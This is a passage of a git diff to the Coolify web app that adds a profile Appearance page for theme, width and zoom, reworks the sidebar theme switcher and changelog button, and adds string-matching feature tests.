+                            <svg x-show="theme === 'dark'" class="menu-item-icon" fill="none" stroke="currentColor" viewBox="0 0 24 24" aria-hidden="true">
+                                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
+                                    d="M20.354 15.354A9 9 0 018.646 3.646 9.003 9.003 0 0012 21a9.003 9.003 0 008.354-5.646z" />
+                            </svg>
+                            <svg x-show="theme === 'light'" class="menu-item-icon" fill="none" stroke="currentColor" viewBox="0 0 24 24" aria-hidden="true">
+                                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
+                                    d="M12 3v1m0 16v1m9-9h-1M4 12H3m15.364 6.364l-.707-.707M6.343 6.343l-.707-.707m12.728 0l-.707.707M6.343 17.657l-.707.707M16 12a4 4 0 11-8 0 4 4 0 018 0z" />
+                            </svg>
+                            <svg x-show="theme === 'system'" class="menu-item-icon" fill="none" stroke="currentColor" viewBox="0 0 24 24" aria-hidden="true">
+                                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
+                                    d="M9.75 17L9 20l-1 1h8l-1-1-.75-3M3 13h18M5 17h14a2 2 0 002-2V5a2 2 0 00-2-2H5a2 2 0 00-2 2v10a2 2 0 002 2z" />
+                            </svg>
+                            <span class="menu-item-label">Theme</span>
+                            <div class="ml-auto flex items-center gap-0.5 rounded-sm bg-neutral-100 p-0.5 dark:bg-coolgray-200">
+                                <button type="button" @click.stop="setTheme('light')" title="Light" aria-label="Use light theme"
+                                    class="grid size-6 place-items-center rounded-sm text-xs hover:bg-white hover:text-coollabs dark:hover:bg-base dark:hover:text-warning"
+                                    :class="theme === 'light' && 'bg-white text-coollabs shadow-sm dark:bg-base dark:text-warning'">
+                                    <svg class="size-4" fill="none" stroke="currentColor" viewBox="0 0 24 24" aria-hidden="true">
+                                        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
+                                            d="M12 3v1m0 16v1m9-9h-1M4 12H3m15.364 6.364l-.707-.707M6.343 6.343l-.707-.707m12.728 0l-.707.707M6.343 17.657l-.707.707M16 12a4 4 0 11-8 0 4 4 0 018 0z" />
+                                    </svg>
+                                </button>
+                                <button type="button" @click.stop="setTheme('system')" title="System default" aria-label="Use system theme"
+                                    class="grid size-6 place-items-center rounded-sm text-xs hover:bg-white hover:text-coollabs dark:hover:bg-base dark:hover:text-warning"
+                                    :class="theme === 'system' && 'bg-white text-coollabs shadow-sm dark:bg-base dark:text-warning'">
+                                    <svg class="size-4" fill="none" stroke="currentColor" viewBox="0 0 24 24" aria-hidden="true">
+                                        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
+                                            d="M9.75 17L9 20l-1 1h8l-1-1-.75-3M3 13h18M5 17h14a2 2 0 002-2V5a2 2 0 00-2-2H5a2 2 0 00-2 2v10a2 2 0 002 2z" />
+                                    </svg>
+                                </button>
+                                <button type="button" @click.stop="setTheme('dark')" title="Dark" aria-label="Use dark theme"
+                                    class="grid size-6 place-items-center rounded-sm text-xs hover:bg-white hover:text-coollabs dark:hover:bg-base dark:hover:text-warning"
+                                    :class="theme === 'dark' && 'bg-white text-coollabs shadow-sm dark:bg-base dark:text-warning'">
+                                    <svg class="size-4" fill="none" stroke="currentColor" viewBox="0 0 24 24" aria-hidden="true">
+                                        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
+                                            d="M20.354 15.354A9 9 0 018.646 3.646 9.003 9.003 0 0012 21a9.003 9.003 0 008.354-5.646z" />
+                                    </svg>
+                                </button>
+                            </div>
+                        </div>
+                        <button type="button" @click.stop="cycleTheme()"
+                            :title="`Theme: ${theme === 'system' ? 'System default' : theme}. Click to change.`"
+                            :aria-label="`Theme: ${theme === 'system' ? 'System default' : theme}. Click to change theme.`"
+                            class="menu-item hidden"
+                            :class="collapsed && 'lg:flex'">
+                            <svg x-show="theme === 'dark'" class="menu-item-icon" fill="none" stroke="currentColor" viewBox="0 0 24 24" aria-hidden="true">
+                                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
+                                    d="M20.354 15.354A9 9 0 018.646 3.646 9.003 9.003 0 0012 21a9.003 9.003 0 008.354-5.646z" />
+                            </svg>
+                            <svg x-show="theme === 'light'" class="menu-item-icon" fill="none" stroke="currentColor" viewBox="0 0 24 24" aria-hidden="true">
+                                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
+                                    d="M12 3v1m0 16v1m9-9h-1M4 12H3m15.364 6.364l-.707-.707M6.343 6.343l-.707-.707m12.728 0l-.707.707M6.343 17.657l-.707.707M16 12a4 4 0 11-8 0 4 4 0 018 0z" />
+                            </svg>
+                            <svg x-show="theme === 'system'" class="menu-item-icon" fill="none" stroke="currentColor" viewBox="0 0 24 24" aria-hidden="true">
+                                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
+                                    d="M9.75 17L9 20l-1 1h8l-1-1-.75-3M3 13h18M5 17h14a2 2 0 002-2V5a2 2 0 00-2-2H5a2 2 0 00-2 2v10a2 2 0 002 2z" />
+                            </svg>
+                        </button>
+                    </li>
                     @if (isInstanceAdmin() && !isCloud())
                         @persist('upgrade')
                             <li>
diff --git a/resources/views/components/profile/navbar.blade.php b/resources/views/components/profile/navbar.blade.php
new file mode 100644
index 000000000..4c1554ee3
--- /dev/null
+++ b/resources/views/components/profile/navbar.blade.php
@@ -0,0 +1,17 @@
+<div class="pb-6">
+    <h1>Profile</h1>
+    <div class="subtitle">Your user profile settings.</div>
+    <div class="navbar-main">
+        <nav class="flex items-center gap-6 min-h-10">
+            <a class="{{ request()->routeIs('profile') ? 'dark:text-white' : '' }}" {{ wireNavigate() }}
+                href="{{ route('profile') }}">
+                General
+            </a>
+            <a class="{{ request()->routeIs('profile.appearance') ? 'dark:text-white' : '' }}" {{ wireNavigate() }}
+                href="{{ route('profile.appearance') }}">
+                Appearance
+            </a>
+            <div class="flex-1"></div>
+        </nav>
+    </div>
+</div>
diff --git a/resources/views/livewire/profile/appearance.blade.php b/resources/views/livewire/profile/appearance.blade.php
new file mode 100644
index 000000000..45c2ac96c
--- /dev/null
+++ b/resources/views/livewire/profile/appearance.blade.php
@@ -0,0 +1,119 @@
+<div>
+    <x-slot:title>
+        Appearance | Coolify
+    </x-slot>
+    <x-profile.navbar />
+
+    <div x-data="{
+        theme: localStorage.getItem('theme') || 'dark',
+        pageWidth: localStorage.getItem('pageWidth') || 'full',
+        zoom: localStorage.getItem('zoom') || '100',
+        init() {
+            localStorage.setItem('theme', this.theme);
+            localStorage.setItem('pageWidth', this.pageWidth);
+            localStorage.setItem('zoom', this.zoom);
+            this.applyTheme();
+        },
+        setTheme(type) {
+            this.theme = type;
+            localStorage.setItem('theme', type);
+            this.applyTheme();
+        },
+        applyTheme() {
+            const prefersDark = window.matchMedia('(prefers-color-scheme: dark)').matches;
+            const isDark = this.theme === 'dark' || (this.theme === 'system' && prefersDark);
+            document.documentElement.classList.toggle('dark', isDark);
+            document.querySelector('meta[name=theme-color]')?.setAttribute('content', isDark ? '#101010' : '#ffffff');
+        },
+        setWidth(width) {
+            this.pageWidth = width;
+            localStorage.setItem('pageWidth', width);
+            window.location.reload();
+        },
+        setZoom(value) {
+            this.zoom = value;
+            localStorage.setItem('zoom', value);
+            window.location.reload();
+        },
+    }" class="flex max-w-2xl flex-col">
+        <section class="space-y-1.5">
+            <h2>Appearance</h2>
+            <div>Choose how Coolify looks in this browser.</div>
+            <div class="flex flex-wrap gap-1.5">
+                <button type="button" @click="setTheme('light')" aria-label="Use light theme"
+                    class="flex items-center gap-2 rounded-sm border border-neutral-300 bg-white px-2 py-1 text-left text-sm hover:bg-neutral-100 focus-visible:ring-2 focus-visible:ring-coollabs dark:border-coolgray-300 dark:bg-coolgray-100 dark:hover:bg-coolgray-200 dark:focus-visible:ring-warning"
+                    :class="theme === 'light' && 'border-coollabs text-coollabs dark:border-warning dark:text-warning'">
+                    <svg class="size-4 shrink-0" fill="none" stroke="currentColor" viewBox="0 0 24 24" aria-hidden="true">
+                        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
+                            d="M12 3v1m0 16v1m9-9h-1M4 12H3m15.364 6.364l-.707-.707M6.343 6.343l-.707-.707m12.728 0l-.707.707M6.343 17.657l-.707.707M16 12a4 4 0 11-8 0 4 4 0 018 0z" />
+                    </svg>
+                    <span>Light</span>
+                </button>
+                <button type="button" @click="setTheme('system')" aria-label="Use system theme"
+                    class="flex items-center gap-2 rounded-sm border border-neutral-300 bg-white px-2 py-1 text-left text-sm hover:bg-neutral-100 focus-visible:ring-2 focus-visible:ring-coollabs dark:border-coolgray-300 dark:bg-coolgray-100 dark:hover:bg-coolgray-200 dark:focus-visible:ring-warning"
+                    :class="theme === 'system' && 'border-coollabs text-coollabs dark:border-warning dark:text-warning'">
+                    <svg class="size-4 shrink-0" fill="none" stroke="currentColor" viewBox="0 0 24 24" aria-hidden="true">
+                        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
+                            d="M9.75 17L9 20l-1 1h8l-1-1-.75-3M3 13h18M5 17h14a2 2 0 002-2V5a2 2 0 00-2-2H5a2 2 0 00-2 2v10a2 2 0 002 2z" />
+                    </svg>
+                    <span>System</span>
+                </button>
+                <button type="button" @click="setTheme('dark')" aria-label="Use dark theme"
+                    class="flex items-center gap-2 rounded-sm border border-neutral-300 bg-white px-2 py-1 text-left text-sm hover:bg-neutral-100 focus-visible:ring-2 focus-visible:ring-coollabs dark:border-coolgray-300 dark:bg-coolgray-100 dark:hover:bg-coolgray-200 dark:focus-visible:ring-warning"
+                    :class="theme === 'dark' && 'border-coollabs text-coollabs dark:border-warning dark:text-warning'">
+                    <svg class="size-4 shrink-0" fill="none" stroke="currentColor" viewBox="0 0 24 24" aria-hidden="true">
+                        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
+                            d="M20.354 15.354A9 9 0 018.646 3.646 9.003 9.003 0 0012 21a9.003 9.003 0 008.354-5.646z" />
+                    </svg>
+                    <span>Dark</span>
+                </button>
+            </div>
+        </section>
+
+        <section class="space-y-1.5">
+            <h2>Width</h2>
+            <div>Choose the maximum page width for this browser.</div>
+            <div class="flex flex-wrap gap-1.5">
+                <button type="button" @click="setWidth('center')" aria-label="Use centered width"
+                    class="flex items-center gap-2 rounded-sm border border-neutral-300 bg-white px-2 py-1 text-sm hover:bg-neutral-100 focus-visible:ring-2 focus-visible:ring-coollabs dark:border-coolgray-300 dark:bg-coolgray-100 dark:hover:bg-coolgray-200 dark:focus-visible:ring-warning"
+                    :class="pageWidth === 'center' && 'border-coollabs text-coollabs dark:border-warning dark:text-warning'">
+                    <svg class="size-4 shrink-0" fill="none" stroke="currentColor" viewBox="0 0 24 24" aria-hidden="true">
+                        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M4 6h16M4 12h16M4 18h7" />
+                    </svg>
+                    Center
+                </button>
+                <button type="button" @click="setWidth('full')" aria-label="Use full width"
+                    class="flex items-center gap-2 rounded-sm border border-neutral-300 bg-white px-2 py-1 text-sm hover:bg-neutral-100 focus-visible:ring-2 focus-visible:ring-coollabs dark:border-coolgray-300 dark:bg-coolgray-100 dark:hover:bg-coolgray-200 dark:focus-visible:ring-warning"
+                    :class="pageWidth === 'full' && 'border-coollabs text-coollabs dark:border-warning dark:text-warning'">
+                    <svg class="size-4 shrink-0" fill="none" stroke="currentColor" viewBox="0 0 24 24" aria-hidden="true">
+                        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M4 6h16M4 12h16M4 18h16" />
+                    </svg>
+                    Full
+                </button>
+            </div>
+        </section>
+
+        <section class="space-y-1.5">
+            <h2>Zoom</h2>
+            <div>Choose interface density for this browser.</div>
+            <div class="flex flex-wrap gap-1.5">
+                <button type="button" @click="setZoom('100')" aria-label="Use 100 percent zoom"
+                    class="flex items-center gap-2 rounded-sm border border-neutral-300 bg-white px-2 py-1 text-sm hover:bg-neutral-100 focus-visible:ring-2 focus-visible:ring-coollabs dark:border-coolgray-300 dark:bg-coolgray-100 dark:hover:bg-coolgray-200 dark:focus-visible:ring-warning"
+                    :class="zoom === '100' && 'border-coollabs text-coollabs dark:border-warning dark:text-warning'">
+                    <svg class="size-4 shrink-0" fill="none" stroke="currentColor" viewBox="0 0 24 24" aria-hidden="true">
+                        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M21 21l-6-6m2-5a7 7 0 11-14 0 7 7 0 0114 0z" />
+                    </svg>
+                    100%
+                </button>
+                <button type="button" @click="setZoom('90')" aria-label="Use 90 percent zoom"
+                    class="flex items-center gap-2 rounded-sm border border-neutral-300 bg-white px-2 py-1 text-sm hover:bg-neutral-100 focus-visible:ring-2 focus-visible:ring-coollabs dark:border-coolgray-300 dark:bg-coolgray-100 dark:hover:bg-coolgray-200 dark:focus-visible:ring-warning"
+                    :class="zoom === '90' && 'border-coollabs text-coollabs dark:border-warning dark:text-warning'">
+                    <svg class="size-4 shrink-0" fill="none" stroke="currentColor" viewBox="0 0 24 24" aria-hidden="true">
+                        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M21 21l-6-6m2-5a7 7 0 11-14 0 7 7 0 0114 0zM10 10h4v4h-4v-4z" />
+                    </svg>
+                    90%
+                </button>
+            </div>
+        </section>
+    </div>
+</div>
diff --git a/resources/views/livewire/profile/index.blade.php b/resources/views/livewire/profile/index.blade.php
index 11031b7f2..d5664fd68 100644
--- a/resources/views/livewire/profile/index.blade.php
+++ b/resources/views/livewire/profile/index.blade.php
@@ -2,8 +2,7 @@
     <x-slot:title>
         Profile | Coolify
     </x-slot>
-    <h1>Profile</h1>
-    <div class="subtitle -mt-2">Your user profile settings.</div>
+    <x-profile.navbar />
     <form wire:submit='submit' class="flex flex-col">
         <div class="flex items-center gap-2">
             <h2>General</h2>
diff --git a/resources/views/livewire/settings-dropdown.blade.php b/resources/views/livewire/settings-dropdown.blade.php
index efd359098..4c4ccd170 100644
--- a/resources/views/livewire/settings-dropdown.blade.php
+++ b/resources/views/livewire/settings-dropdown.blade.php
@@ -103,138 +103,98 @@
             return new Date(b.published_at) - new Date(a.published_at);
         });
     }
-}" @click.outside="dropdownOpen = false">
-    <!-- Custom Dropdown without arrow -->
-    <div class="relative">
-        <button @click="dropdownOpen = !dropdownOpen"
-            class="relative p-2 dark:text-neutral-400 hover:dark:text-white transition-colors cursor-pointer"
-            title="Preferences">
-            <!-- Sliders Icon -->
-            <svg class="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24" title="Preferences">
+}" @click.outside="dropdownOpen = false" class="{{ $trigger === 'changelog-sidebar' ? 'w-full' : '' }}">
+    @if ($trigger === 'changelog-sidebar')
+        <button wire:click="openWhatsNewModal" type="button" title="What's New" aria-label="What's New"
+            class="relative text-left menu-item">
+            <svg class="menu-item-icon" fill="none" stroke="currentColor" viewBox="0 0 24 24" aria-hidden="true">
                 <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
-                    d="M12 6V4m0 2a2 2 0 100 4m0-4a2 2 0 110 4m-6 8a2 2 0 100-4m0 4a2 2 0 110-4m0 4v2m0-6V4m6 6v10m6-2a2 2 0 100-4m0 4a2 2 0 110-4m0 4v2m0-6V4" />
+                    d="M9 12h6m-6 4h6m2 5H7a2 2 0 01-2-2V5a2 2 0 012-2h5.586a1 1 0 01.707.293l5.414 5.414a1 1 0 01.293.707V19a2 2 0 01-2 2z" />
             </svg>
-
-            <!-- Unread Count Badge -->
+            <span class="text-left menu-item-label" :class="collapsed && 'lg:hidden'">What's New</span>
             @if ($unreadCount > 0)
                 <span
-                    class="absolute -top-1 -right-1 bg-error text-white text-xs rounded-full w-4.5 h-4.5 flex items-center justify-center">
+                    class="absolute top-0 right-0 bg-error text-white text-[10px] rounded-full min-w-4 h-4 px-1 flex items-center justify-center"
+                    aria-label="{{ $unreadCount }} unread changelog {{ Str::plural('entry', $unreadCount) }}">
                     {{ $unreadCount > 9 ? '9+' : $unreadCount }}
                 </span>
             @endif
         </button>
+    @else
+        <!-- Custom Dropdown without arrow -->
+        <div class="relative">
+            <button @click="dropdownOpen = !dropdownOpen"
+                class="relative p-2 dark:text-neutral-400 hover:dark:text-white transition-colors cursor-pointer"
+                title="Preferences">
+                <!-- Sliders Icon -->
+                <svg class="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24" title="Preferences">
+                    <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
+                        d="M12 6V4m0 2a2 2 0 100 4m0-4a2 2 0 110 4m-6 8a2 2 0 100-4m0 4a2 2 0 110-4m0 4v2m0-6V4m6 6v10m6-2a2 2 0 100-4m0 4a2 2 0 110-4m0 4v2m0-6V4" />
+                </svg>
 
-        <!-- Dropdown Menu -->
-        <div x-show="dropdownOpen" x-transition:enter="ease-out duration-200"
-            x-transition:enter-start="opacity-0 -translate-y-2" x-transition:enter-end="opacity-100 translate-y-0"
-            x-transition:leave="ease-in duration-150" x-transition:leave-start="opacity-100 translate-y-0"
-            x-transition:leave-end="opacity-0 -translate-y-2" class="absolute right-0 top-full mt-1 z-50 w-48" x-cloak>
-            <div
-                class="p-1 bg-white border rounded-sm shadow-lg dark:bg-coolgray-200 dark:border-coolgray-300 border-neutral-300">
-                <div class="flex flex-col gap-1">
-                    <!-- What's New Section -->
-                    @if ($unreadCount > 0)
-                        <button wire:click="openWhatsNewModal" @click="dropdownOpen = false"
-                            class="px-1 dropdown-item-no-padding flex items-center justify-between">
-                            <div class="flex items-center gap-2">
-                                <svg class="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
-                                    <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
-                                        d="M13 16h-1v-4h-1m1-4h.01M21 12a9 9 0 11-18 0 9 9 0 0118 0z" />
-                                </svg>
-                                <span>What's New</span>
-                            </div>
-                            <span
-                                class="bg-error text-white text-xs rounded-full w-5 h-5 flex items-center justify-center">
-                                {{ $unreadCount > 9 ? '9+' : $unreadCount }}
-                            </span>
+                <!-- Unread Count Badge -->
+                @if ($unreadCount > 0)
+                    <span
+                        class="absolute -top-1 -right-1 bg-error text-white text-xs rounded-full w-4.5 h-4.5 flex items-center justify-center">
+                        {{ $unreadCount > 9 ? '9+' : $unreadCount }}
+                    </span>
+                @endif
+            </button>
+
+            <!-- Dropdown Menu -->
+            <div x-show="dropdownOpen" x-transition:enter="ease-out duration-200"
+                x-transition:enter-start="opacity-0 -translate-y-2" x-transition:enter-end="opacity-100 translate-y-0"
+                x-transition:leave="ease-in duration-150" x-transition:leave-start="opacity-100 translate-y-0"
+                x-transition:leave-end="opacity-0 -translate-y-2" class="absolute right-0 top-full mt-1 z-50 w-48" x-cloak>
+                <div
+                    class="p-1 bg-white border rounded-sm shadow-lg dark:bg-coolgray-200 dark:border-coolgray-300 border-neutral-300">
+                    <div class="flex flex-col gap-1">
+                        <!-- Width Section -->
+                        <div
+                            class="my-1 font-bold border-b dark:border-coolgray-500 border-neutral-300 dark:text-white text-md">
+                            Width</div>
+                        <button @click="switchWidth(); dropdownOpen = false"
+                            class="px-1 dropdown-item-no-padding flex items-center gap-2" x-show="full === 'full'">
+                            <svg class="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
+                                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
+                                    d="M4 6h16M4 12h16M4 18h7" />
+                            </svg>
+                            <span>Center</span>
                         </button>
-                    @else
-                        <button wire:click="openWhatsNewModal" @click="dropdownOpen = false"
+                        <button @click="switchWidth(); dropdownOpen = false"
+                            class="px-1 dropdown-item-no-padding flex items-center gap-2" x-show="full === 'center'">
+                            <svg class="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
+                                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
+                                    d="M4 6h16M4 12h16M4 18h16" />
+                            </svg>
+                            <span>Full</span>
+                        </button>
+
+                        <!-- Zoom Section -->
+                        <div
+                            class="my-1 font-bold border-b dark:border-coolgray-500 border-neutral-300 dark:text-white text-md">
+                            Zoom</div>
+                        <button @click="setZoom(100); dropdownOpen = false"
                             class="px-1 dropdown-item-no-padding flex items-center gap-2">
                             <svg class="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                                 <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
-                                    d="M9 12h6m-6 4h6m2 5H7a2 2 0 01-2-2V5a2 2 0 012-2h5.586a1 1 0 01.707.293l5.414 5.414a1 1 0 01.293.707V19a2 2 0 01-2 2z" />
+                                    d="M21 21l-6-6m2-5a7 7 0 11-14 0 7 7 0 0114 0z" />
                             </svg>
-                            <span>Changelog</span>
+                            <span>100%</span>
                         </button>
-                    @endif
-
-                    <!-- Divider -->
-                    <div class="border-b dark:border-coolgray-500 border-neutral-300"></div>
-
-                    <!-- Theme Section -->
-                    <div class="font-bold border-b dark:border-coolgray-500 border-neutral-300 dark:text-white pb-1">
-                        Appearance</div>
-                    <button @click="setTheme('dark'); dropdownOpen = false"
-                        class="px-1 dropdown-item-no-padding flex items-center gap-2">
-                        <svg class="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
-                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
-                                d="M20.354 15.354A9 9 0 018.646 3.646 9.003 9.003 0 0012 21a9.003 9.003 0 008.354-5.646z" />
-                        </svg>
-                        <span>Dark</span>
-                    </button>
-                    <button @click="setTheme('light'); dropdownOpen = false"
-                        class="px-1 dropdown-item-no-padding flex items-center gap-2">
-                        <svg class="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
-                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
-                                d="M12 3v1m0 16v1m9-9h-1M4 12H3m15.364 6.364l-.707-.707M6.343 6.343l-.707-.707m12.728 0l-.707.707M6.343 17.657l-.707.707M16 12a4 4 0 11-8 0 4 4 0 018 0z" />
-                        </svg>
-                        <span>Light</span>
-                    </button>
-                    <button @click="setTheme('system'); dropdownOpen = false"
-                        class="px-1 dropdown-item-no-padding flex items-center gap-2">
-                        <svg class="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
-                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
-                                d="M9.75 17L9 20l-1 1h8l-1-1-.75-3M3 13h18M5 17h14a2 2 0 002-2V5a2 2 0 00-2-2H5a2 2 0 00-2 2v10a2 2 0 002 2z" />
-                        </svg>
-                        <span>System</span>
-                    </button>
-
-                    <!-- Width Section -->
-                    <div
-                        class="my-1 font-bold border-b dark:border-coolgray-500 border-neutral-300 dark:text-white text-md">
-                        Width</div>
-                    <button @click="switchWidth(); dropdownOpen = false"
-                        class="px-1 dropdown-item-no-padding flex items-center gap-2" x-show="full === 'full'">
-                        <svg class="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
-                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
-                                d="M4 6h16M4 12h16M4 18h7" />
-                        </svg>
-                        <span>Center</span>
-                    </button>
-                    <button @click="switchWidth(); dropdownOpen = false"
-                        class="px-1 dropdown-item-no-padding flex items-center gap-2" x-show="full === 'center'">
-                        <svg class="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
-                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
-                                d="M4 6h16M4 12h16M4 18h16" />
-                        </svg>
-                        <span>Full</span>
-                    </button>
-
-                    <!-- Zoom Section -->
-                    <div
-                        class="my-1 font-bold border-b dark:border-coolgray-500 border-neutral-300 dark:text-white text-md">
-                        Zoom</div>
-                    <button @click="setZoom(100); dropdownOpen = false"
-                        class="px-1 dropdown-item-no-padding flex items-center gap-2">
-                        <svg class="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
-                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
-                                d="M21 21l-6-6m2-5a7 7 0 11-14 0 7 7 0 0114 0z" />
-                        </svg>
-                        <span>100%</span>
-                    </button>
-                    <button @click="setZoom(90); dropdownOpen = false"
-                        class="px-1 dropdown-item-no-padding flex items-center gap-2">
-                        <svg class="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
-                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
-                                d="M21 21l-6-6m2-5a7 7 0 11-14 0 7 7 0 0114 0zM10 10h4v4h-4v-4z" />
-                        </svg>
-                        <span>90%</span>
-                    </button>
+                        <button @click="setZoom(90); dropdownOpen = false"
+                            class="px-1 dropdown-item-no-padding flex items-center gap-2">
+                            <svg class="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
+                                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
+                                    d="M21 21l-6-6m2-5a7 7 0 11-14 0 7 7 0 0114 0zM10 10h4v4h-4v-4z" />
+                            </svg>
+                            <span>90%</span>
+                        </button>
+                    </div>
                 </div>
             </div>
         </div>
-    </div>
+    @endif
 
     <!-- What's New Modal -->
     @if ($showWhatsNewModal)
@@ -262,8 +222,7 @@ class="relative w-full h-full max-w-7xl py-6 border rounded-sm drop-shadow-sm bg
                     </div>
                     <div class="flex items-center gap-2">
                         @if (isDev())
-                            <x-forms.button wire:click="manualFetchChangelog"
-                                class="bg-coolgray-200 hover:bg-coolgray-300">
+                            <x-forms.button wire:click="manualFetchChangelog">
                                 <svg class="w-4 h-4 mr-2" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                                     <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
                                         d="M4 4v5h.582m15.356 2A8.001 8.001 0 004.582 9m0 0H9m11 11v-5h-.581m0 0a8.003 8.003 0 01-15.357-2m15.357 2H15" />
diff --git a/routes/web.php b/routes/web.php
index 55067f46f..aed37a086 100644
--- a/routes/web.php
+++ b/routes/web.php
@@ -15,6 +15,7 @@
 use App\Livewire\Notifications\Slack as NotificationSlack;
 use App\Livewire\Notifications\Telegram as NotificationTelegram;
 use App\Livewire\Notifications\Webhook as NotificationWebhook;
+use App\Livewire\Profile\Appearance as ProfileAppearance;
 use App\Livewire\Profile\Index as ProfileIndex;
 use App\Livewire\Project\Application\Configuration as ApplicationConfiguration;
 use App\Livewire\Project\Application\Deployment\Index as DeploymentIndex;
@@ -124,6 +125,7 @@
     Route::get('/settings/scheduled-jobs', SettingsScheduledJobs::class)->name('settings.scheduled-jobs');
 
     Route::get('/profile', ProfileIndex::class)->name('profile');
+    Route::get('/profile/appearance', ProfileAppearance::class)->name('profile.appearance');
 
     Route::prefix('tags')->group(function () {
         Route::get('/{tagName?}', TagsShow::class)->name('tags.show');
diff --git a/tests/Feature/ProfileAppearanceNavigationTest.php b/tests/Feature/ProfileAppearanceNavigationTest.php
new file mode 100644
index 000000000..b81a1c6a5
--- /dev/null
+++ b/tests/Feature/ProfileAppearanceNavigationTest.php
@@ -0,0 +1,43 @@
+<?php
+
+it('adds profile navigation with an appearance tab and route', function () {
+    $routes = file_get_contents(base_path('routes/web.php'));
+    $profileNavbar = file_get_contents(resource_path('views/components/profile/navbar.blade.php'));
+    $profileView = file_get_contents(resource_path('views/livewire/profile/index.blade.php'));
+
+    expect($routes)
+        ->toContain("Route::get('/profile/appearance', ProfileAppearance::class)->name('profile.appearance')")
+        ->and($profileNavbar)
+        ->toContain('route(\'profile\')')
+        ->toContain('route(\'profile.appearance\')')
+        ->toContain('General')
+        ->toContain('Appearance')
+        ->and($profileView)
+        ->toContain('<x-profile.navbar />')
+        ->not->toContain('<h1>Profile</h1>\n    <div class="subtitle -mt-2">');
+});
+
+it('moves appearance preferences to the profile appearance view', function () {
+    $appearanceView = file_get_contents(resource_path('views/livewire/profile/appearance.blade.php'));
+
+    expect($appearanceView)
+        ->toContain('<x-profile.navbar />')
+        ->toContain("setTheme('light')")
+        ->toContain("setTheme('system')")
+        ->toContain("setTheme('dark')")
+        ->toContain("setWidth('center')")
+        ->toContain("setWidth('full')")
+        ->toContain("setZoom('100')")
+        ->toContain("setZoom('90')")
+        ->toContain('aria-label="Use light theme"')
+        ->toContain('aria-label="Use system theme"')
+        ->toContain('aria-label="Use dark theme"')
+        ->toContain('aria-label="Use centered width"')
+        ->toContain('aria-label="Use full width"')
+        ->toContain('aria-label="Use 100 percent zoom"')
+        ->toContain('aria-label="Use 90 percent zoom"')
+        ->toContain('max-w-2xl')
+        ->toContain('class="space-y-1.5"')
+        ->toContain('gap-1.5')
+        ->toContain('px-2 py-1 text-sm');
+});
diff --git a/tests/Feature/SidebarNavigationPreferencesTest.php b/tests/Feature/SidebarNavigationPreferencesTest.php
new file mode 100644
index 000000000..b77758f58
--- /dev/null
+++ b/tests/Feature/SidebarNavigationPreferencesTest.php
@@ -0,0 +1,63 @@
+<?php
+
+use App\Livewire\SettingsDropdown;
+
+it('keeps changelog and the theme switcher in the sidebar without the old preferences trigger', function () {
+    $navbarView = file_get_contents(resource_path('views/components/navbar.blade.php'));
+
+    expect($navbarView)
+        ->toContain('<livewire:settings-dropdown trigger="changelog-sidebar" />')
+        ->not->toContain('<livewire:settings-dropdown />')
+        ->toContain('aria-label="Theme switcher"')
+        ->toContain('aria-label="Use light theme"')
+        ->toContain('aria-label="Use system theme"')
+        ->toContain('aria-label="Use dark theme"')
+        ->toContain('cycleTheme()')
+        ->toContain("const themes = ['light', 'system', 'dark'];")
+        ->toContain('pl-2 pr-3 items-start gap-3')
+        ->toContain('class="flex min-w-0 flex-1 flex-col"')
+        ->toContain('class="min-w-0 flex-1"')
+        ->toContain('class="flex h-8 w-full items-center justify-between');
+});
+
+it('keeps changelog and appearance options out of the preferences dropdown', function () {
+    $dropdownView = file_get_contents(resource_path('views/livewire/settings-dropdown.blade.php'));
+
+    expect($dropdownView)
+        ->toContain("\$trigger === 'changelog-sidebar'")
+        ->toContain('title="What\'s New"')
